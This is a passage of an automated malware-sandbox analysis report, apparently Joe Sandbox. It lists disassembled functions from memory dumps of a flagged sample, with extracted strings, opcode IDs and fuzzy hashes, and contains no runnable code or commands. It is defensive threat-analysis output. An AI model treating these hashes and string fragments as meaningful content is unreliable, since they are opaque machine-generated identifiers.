                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00BC02BD
                                                                                                                        • RTL: Re-Waiting, xrefs: 00BC031E
                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00BC02E7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                        • API String ID: 0-2474120054
                                                                                                                        • Opcode ID: b2b46a8dca71b4d8cb04877352a7cc4b963c7557eaf527623203cc3444eee4b8
                                                                                                                        • Instruction ID: 86d440aa05e94bd09c6177f520f8fd1916d85b64eb157c8c4dce7bfceb19e5ef
                                                                                                                        • Opcode Fuzzy Hash: b2b46a8dca71b4d8cb04877352a7cc4b963c7557eaf527623203cc3444eee4b8
                                                                                                                        • Instruction Fuzzy Hash: E6E1AD30618742DFD724DF28C885B2AB7E0FB88314F244AADF5A98B2E1D774D945CB46
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B8BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • RTL: Resource at %p, xrefs: 00BC7B8E
                                                                                                                        • RTL: Re-Waiting, xrefs: 00BC7BAC
                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00BC7B7F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 0-871070163
                                                                                                                        • Opcode ID: 1e2a2c3563040acd07e6ee7cca04f8014b771879aecd1cc40a8e02dd5790db59
                                                                                                                        • Instruction ID: 899e4d3a26e72587dd0f90dc665fe58c3f5e3c288f7ee583a3e026afad5e7bb3
                                                                                                                        • Opcode Fuzzy Hash: 1e2a2c3563040acd07e6ee7cca04f8014b771879aecd1cc40a8e02dd5790db59
                                                                                                                        • Instruction Fuzzy Hash: 0041E1357447029FCB20EE25CC51F6AB7E5EF88710F100AADF95A9B6A1DB30E805CB91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B8B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BC728C
                                                                                                                        Strings
                                                                                                                        • RTL: Resource at %p, xrefs: 00BC72A3
                                                                                                                        • RTL: Re-Waiting, xrefs: 00BC72C1
                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00BC7294
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                        • Opcode ID: c87f4dbf9b3244b160457652eaa49ecc6299a3dcbd50cfa77bc35b0858d7af79
                                                                                                                        • Instruction ID: db895704753366a32cb35628036f3aca51eb2cb6a838cfa79dbce9e257868a36
                                                                                                                        • Opcode Fuzzy Hash: c87f4dbf9b3244b160457652eaa49ecc6299a3dcbd50cfa77bc35b0858d7af79
                                                                                                                        • Instruction Fuzzy Hash: 5941F031788616ABDB20DE25CC42F66B7E5FB55710F2406ADF855EB391DB20E802CBD1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00C02300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                        • Opcode ID: 4ccd49c11f59cab2de3960d201126df94fd874d1cfd84f4e563959ca177c580b
                                                                                                                        • Instruction ID: 113ff3ab1c6e1ecf149bade049aa079c9ae64acde04ecc01b893d81395ff172c
                                                                                                                        • Opcode Fuzzy Hash: 4ccd49c11f59cab2de3960d201126df94fd874d1cfd84f4e563959ca177c580b
                                                                                                                        • Instruction Fuzzy Hash: 12317172A002199FCB20DF29CC45BEEB7FCEB44710F444596E849E3290EB34AA45DBA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B97D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-
                                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                        • Instruction ID: cc573334c1439e4c1047e8adbdce0ca22f5f7e24c6c431eaf38a652085a1c0b7
                                                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                        • Instruction Fuzzy Hash: 9091A270E9825A9BDF24DF69C881BBEB7E5EF45720F2445BAE855A72C0EF308D408750
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B59126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $$@
                                                                                                                        • API String ID: 0-1194432280
                                                                                                                        • Opcode ID: 4be73331301af81d46cfc829b2b09717608a6026c4cef20731aea44ecc066f39
                                                                                                                        • Instruction ID: c0ef5225bb112a8747c85e74d27be3226faa699258104c8af37b60b01f47c558
                                                                                                                        • Opcode Fuzzy Hash: 4be73331301af81d46cfc829b2b09717608a6026c4cef20731aea44ecc066f39
                                                                                                                        • Instruction Fuzzy Hash: 228109B5D00269DBDB31DF54CC45BEEB7B8AB48750F0041EAA919B7290D7709E84CFA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00BDCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00BDCFBD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallFilterFunc@8
                                                                                                                        • String ID: @$@4Qw@4Qw
                                                                                                                        • API String ID: 4062629308-2383119779
                                                                                                                        • Opcode ID: 0c07fdd76081f5049b919a92f4b9290f07912190c5a76fc00d3035009f7467f1
                                                                                                                        • Instruction ID: 21802018ca2e64d230ebb35302064c08ae845941ad9f6298337691283b5e6169
                                                                                                                        • Opcode Fuzzy Hash: 0c07fdd76081f5049b919a92f4b9290f07912190c5a76fc00d3035009f7467f1
                                                                                                                        • Instruction Fuzzy Hash: 2A418A71900258DFCB219FA9D881AAEFBF8FF95B00F1040AAF945DB365E7348905CB61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Executed Functions

                                                                                                                        Function 05033B64 Relevance: 45.5, Strings: 36, Instructions: 460COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: !B$&|V$Kx$($)$*5$,$-2$2t$6$7$85$:&$:+$;$<N$=$>b$B$B$E$Kx$Oe$T$T?W$\$^4$`$ap$d$d+$dq$gz$h$l$nT$c
                                                                                                                        • API String ID: 0-876757530
                                                                                                                        • Opcode ID: 02417d87d7ef1184d1a5a8fe37a178631bead70575113db123f201228a48067f
                                                                                                                        • Instruction ID: c40f993d6091de506632cc4fa225b962ea55bd452808cbab3f4de8a8c6f8880c
                                                                                                                        • Opcode Fuzzy Hash: 02417d87d7ef1184d1a5a8fe37a178631bead70575113db123f201228a48067f
                                                                                                                        • Instruction Fuzzy Hash: 1342AEB0D05268CBEF64CF44D999BEDBBB6BF45308F1081D9C4196B281C7B95A89CF80
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05040A84 Relevance: 6.4, Strings: 5, Instructions: 147COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 6$O$S$\$s
                                                                                                                        • API String ID: 0-3854637164
                                                                                                                        • Opcode ID: 1663141404f2312e3c704be789aa86149f00c66b4f20a2d0f43e649b5b6c166d
                                                                                                                        • Instruction ID: 63e871d2e250147d4fde29cbb387c44d15af272cb0c6b238d0cefd99e9864d5e
                                                                                                                        • Opcode Fuzzy Hash: 1663141404f2312e3c704be789aa86149f00c66b4f20a2d0f43e649b5b6c166d
                                                                                                                        • Instruction Fuzzy Hash: 204174B2A00119BADB10EB94AD5DFEFB3F8EF54314F0041A5EE09A6140E775AA54CFE1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504CE54 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ;u
                                                                                                                        • API String ID: 0-1560574068
                                                                                                                        • Opcode ID: 89baa806f5a8bcb827445539d77db7a38a8d765747d0afce77dedabffbcb4f82
                                                                                                                        • Instruction ID: ce426032b44057d6ecb2ea499f67b1547e00a20c10024ed3634a72466f468c14
                                                                                                                        • Opcode Fuzzy Hash: 89baa806f5a8bcb827445539d77db7a38a8d765747d0afce77dedabffbcb4f82
                                                                                                                        • Instruction Fuzzy Hash: 2F11CCB6E01218AF8B40DFA9D9409EFB7F9EF99210F14416AE919E3200E6705A058BE0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 050497DB Relevance: .2, Instructions: 160COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d544060d0492ba4021f3954b5082aa52436c41137976536f4f0ec6e2c6fdbf1a
                                                                                                                        • Instruction ID: 6c576998bed23dc00b8e1cdd64e367485ee34008722ba2da3af22dd3f3f38cbb
                                                                                                                        • Opcode Fuzzy Hash: d544060d0492ba4021f3954b5082aa52436c41137976536f4f0ec6e2c6fdbf1a
                                                                                                                        • Instruction Fuzzy Hash: C2418B72A082119FD705DA7CECC5AFEB76CEF92624F1006BED4848F082D72258078B92
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0502D294 Relevance: .1, Instructions: 130COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a4617c23492e4f3c43b1ab50a048d72e89592c50bc7ad88fdc2b1e4803445c4f
                                                                                                                        • Instruction ID: b9f5f1d001d9546d9e60e5ea38907fb9fc95ade27f2c367036c3569200ad664b
                                                                                                                        • Opcode Fuzzy Hash: a4617c23492e4f3c43b1ab50a048d72e89592c50bc7ad88fdc2b1e4803445c4f
                                                                                                                        • Instruction Fuzzy Hash: C94101B1D11218AFDB04CF99D885AEEBBBCFF48710F10415AFA14E6240D7B19A41CFA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05039BA4 Relevance: .1, Instructions: 96COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: aa9aa70edc74b0b78662eec3ff2b8c733d29437c18c0e62f1ba70590e4221e4d
                                                                                                                        • Instruction ID: 84fe019b30ce27edafb6d425893effe5b0672211d671d0c8db71789b1582bd84
                                                                                                                        • Opcode Fuzzy Hash: aa9aa70edc74b0b78662eec3ff2b8c733d29437c18c0e62f1ba70590e4221e4d
                                                                                                                        • Instruction Fuzzy Hash: 8C21F67261030866DB60AF79AC8DFFF73ECFF54310F444999ED5992161FA708541C6A0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05039B9C Relevance: .1, Instructions: 94COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3893d340e76b7b92bc789538603e7b7eb18e790a394846338c4a06fdb33e2494
                                                                                                                        • Instruction ID: f7e2db861903608d14f396e84691326639819685016c49ef040f93c6a7f4005d
                                                                                                                        • Opcode Fuzzy Hash: 3893d340e76b7b92bc789538603e7b7eb18e790a394846338c4a06fdb33e2494
                                                                                                                        • Instruction Fuzzy Hash: 8221227261030466DB209F74AC8DFEF73ECBF91300F044999EE4697161EA708580C6A0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504E554 Relevance: .1, Instructions: 87COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 30d8e7833089af46cd114bbf345cf11d712c8085254f924778bf105b5637c3ed
                                                                                                                        • Instruction ID: 6049f5c19debb4d45982c10dc01863e1ba51f924511c2cd00a64b20838fbf26f
                                                                                                                        • Opcode Fuzzy Hash: 30d8e7833089af46cd114bbf345cf11d712c8085254f924778bf105b5637c3ed
                                                                                                                        • Instruction Fuzzy Hash: 8621CFB2200549BFDB54DF99EC84EEB73ADAF8C714F108608FA1997240D634E851CBA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504E684 Relevance: .1, Instructions: 79COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c6cbe1fca1f69d251fb7b363e179ec58e056c8c8992dc877e711bdbba584212d
                                                                                                                        • Instruction ID: 3f16265272413b992a6fc842376bc9bdac16fb7e21b10765a05535798f774445
                                                                                                                        • Opcode Fuzzy Hash: c6cbe1fca1f69d251fb7b363e179ec58e056c8c8992dc877e711bdbba584212d
                                                                                                                        • Instruction Fuzzy Hash: A521D0B6200549AFDB14DF99EC84EEB73ADEF8C714F008609FA19A7240D634E951CBA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 050408C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2b7256b9de58f1e5f9dcdfe6c1a4b46a1a9fa2feab021dd5eff7f35025366eb1
                                                                                                                        • Instruction ID: 92e4256eecca1a7d9594aae67e97f95505cfa61e37e5240e25f036aab6c90bb5
                                                                                                                        • Opcode Fuzzy Hash: 2b7256b9de58f1e5f9dcdfe6c1a4b46a1a9fa2feab021dd5eff7f35025366eb1
                                                                                                                        • Instruction Fuzzy Hash: 901186F23802057BF720AA55AC46FAF375C9B94B20F244019FF08AF1C0D6B5B81546B5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504DFE4 Relevance: .1, Instructions: 71COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bf6c8687be1b8a9d388aff82e181b3783d19c104f41b9aa1b3f6c0cb29e98691
                                                                                                                        • Instruction ID: 6f745bfc53df5768006a1efe6300e98ef1b4010cfc34c58a737d18c8fa694f3d
                                                                                                                        • Opcode Fuzzy Hash: bf6c8687be1b8a9d388aff82e181b3783d19c104f41b9aa1b3f6c0cb29e98691
                                                                                                                        • Instruction Fuzzy Hash: 651117B6200649AFDB14DF99EC84EEF73EDAF9D710F008208FA1997240D634A9118BA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504E854 Relevance: .1, Instructions: 63COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b52db7fae8e141aff2968c6f866b5ee51f75ba719bb8f76033e7ff3d73dbb293
                                                                                                                        • Instruction ID: 58ef19464de5375af63cec742777625cb67483d817c3c13b1bbe47b69dd7c3f8
                                                                                                                        • Opcode Fuzzy Hash: b52db7fae8e141aff2968c6f866b5ee51f75ba719bb8f76033e7ff3d73dbb293
                                                                                                                        • Instruction Fuzzy Hash: BA1163B2300649BFDB10DE98EC84EEB73ADEF88710F008409FA0987240DA74B851CBB1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504C9B4 Relevance: .1, Instructions: 62COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c9b5340f0f1336de7dc5247dd8f818f08f0a4faa1364d74a6a5a8bf1fc8274e5
                                                                                                                        • Instruction ID: 2f744a7ce359859005904771271ee31d4481fef63e7c23966a8760266c8057e7
                                                                                                                        • Opcode Fuzzy Hash: c9b5340f0f1336de7dc5247dd8f818f08f0a4faa1364d74a6a5a8bf1fc8274e5
                                                                                                                        • Instruction Fuzzy Hash: 7511DDF6E11219AF8F00DFA9D9409EFB7F9EF58200F14416AE915E7200E6705A058BE1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05049D14 Relevance: .1, Instructions: 59COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2cc8db566a2d0afda169cf39e554042c4fe51b7b45edf600f0587ec796240fbc
                                                                                                                        • Instruction ID: 6d24e7fbad6f945914249dffdc47ef758b4bcc0c3ac740a075f77c8f860231a3
                                                                                                                        • Opcode Fuzzy Hash: 2cc8db566a2d0afda169cf39e554042c4fe51b7b45edf600f0587ec796240fbc
                                                                                                                        • Instruction Fuzzy Hash: F40196F6B402146BE710E664EC4DEFF736CDF54620F000265FE1497241FA70AE518AE2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504D544 Relevance: .1, Instructions: 58COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d8486c930f9b0edb6cbb9d30e870557a0a596ea785dca6b862118389b6b94e95
                                                                                                                        • Instruction ID: 020270c30576d6414c35bc776ef6a89e63a8ca972f9c42847109da74a195b0f1
                                                                                                                        • Opcode Fuzzy Hash: d8486c930f9b0edb6cbb9d30e870557a0a596ea785dca6b862118389b6b94e95
                                                                                                                        • Instruction Fuzzy Hash: DE11F1B2E0121CAF8F40DFE9D9409EEBBF9EF58210F05416AE919F7200F7745A448BA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504DD04 Relevance: .1, Instructions: 51COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 173661e0426da9f1ef9810c6f3972b2669705f845cd542c643e28ae35cb5a8bf
                                                                                                                        • Instruction ID: b18cf207bca19b75375bfab8fbef8a3ba55a4443a8893e969506d927eadc8c34
                                                                                                                        • Opcode Fuzzy Hash: 173661e0426da9f1ef9810c6f3972b2669705f845cd542c643e28ae35cb5a8bf
                                                                                                                        • Instruction Fuzzy Hash: F0015AB13006547BEA10EA59EC49FEF73ADEBD9711F004419FA099B240DA747951CBA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0504DE24 Relevance: .1, Instructions: 51COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dabefb08cd10c2445031813b6740725559fac14081b69d3d5020b57d55564613
                                                                                                                        • Instruction ID: d09e4790d3e6bd1062dafa4cb3aeb25b5ff0aa05be0d3c114ffbde659a45b2ec
                                                                                                                        • Opcode Fuzzy Hash: dabefb08cd10c2445031813b6740725559fac14081b69d3d5020b57d55564613
